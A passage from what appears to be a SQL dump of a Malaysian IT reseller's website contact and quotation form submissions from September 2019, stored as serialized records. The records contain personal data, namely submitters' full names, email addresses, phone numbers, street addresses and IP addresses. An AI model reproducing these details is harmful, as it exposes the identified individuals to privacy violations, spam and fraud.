Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"aimannaim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"maiman03@icould.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164201126\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"aiman\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"huababajnabaha\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-01 01:58:11','115.164.217.255','1'),(287,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Bin Norman Muhammad Aiman Naim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"maiman03@icould.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164201126\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"aiman\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"help\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-01 02:46:47','115.164.217.255','1'),(288,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Zheyi Liew\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"lzheyi@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0127564799\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"AZ Kindergarten and Education Centre\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Taman Johor Jaya JB\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:285:\"Logitech Group, Logitech Rally, Logitech MeetUp, Logitech Connect, Logitech BCC950, Logitech PTZ Pro 2, SMARTDOCK, Logitech Brio, Logitech C9230e, Logitech C925e, Logitech B525, Logitech H570e Headset, SmartDock Extender Box, Screen Share, Group Expansion Mics, Logitech SmartDock Flex\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:132:\"Hi I would like to set up video conferencing function in a small office for small business with tight budget. Please advise. Thanks.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-01 19:37:07','86.174.75.192','1'),(289,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"LOH WAI WEN\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"wen_5354@hotmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0165980662\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"My TicketCharge Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:103:\"No 2, 4, Jalan Metro Pudu 1, Fraser Business Park, 55200 Kuala Lumpur, Wilayah Persekutuan Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"HI, and may I know the cost/quotation of the Logitech Group ?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"69\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-04 12:53:57','211.25.149.66','1'),(290,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Allen Wong Chin Loon\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"allen@tione.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0143388972\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Ti One Holding (M) Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"Hi, Im looking for the video conference system, can you please quote me a quotation?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-05 10:05:50','124.13.187.216','1'),(291,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Asraf Ahmad\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"zaifulasraf.ahmad@petrofac.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0323015217\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Petrofac\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:70:\"Petrofac (M) Limited, Level 28, Menara Prestige, No 1 Jln Pinang 50450\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:96:\"TOUGHBOOK 33, TOUGHBOOK 31, TOUGHBOOK 54, TOUGHBOOK 20, TOUGHBOOK T1, TOUGHBOOK N1, TOUGHBOOK L1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"High-end Spec for Toughbook\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"23\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-05 10:34:54','113.210.98.247','1'),(292,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"siti suhaida\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"sales@thinkingifts.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129690228\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"thinkingifts sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:265:\"we would love to become your agent.. My company&#039;s nature is premium gifts. we received a lot of demand for digital gifts so we are for logitech reseller to do business together. please contact me at sales@thinkingifts.com on how to become your agent. thank you\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"23\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-06 10:39:01','121.121.112.115','1'),(293,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Azmah Syahirah Marman\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"azmah.marman@oroclean.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"03-2633 4444\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Oro Clean Chemie Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:99:\"We are looking for Logitech Rally Plus Solution including two speakers and two mic pods. Thank you.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"17\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-06 15:44:40','211.24.96.17','1'),(294,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact 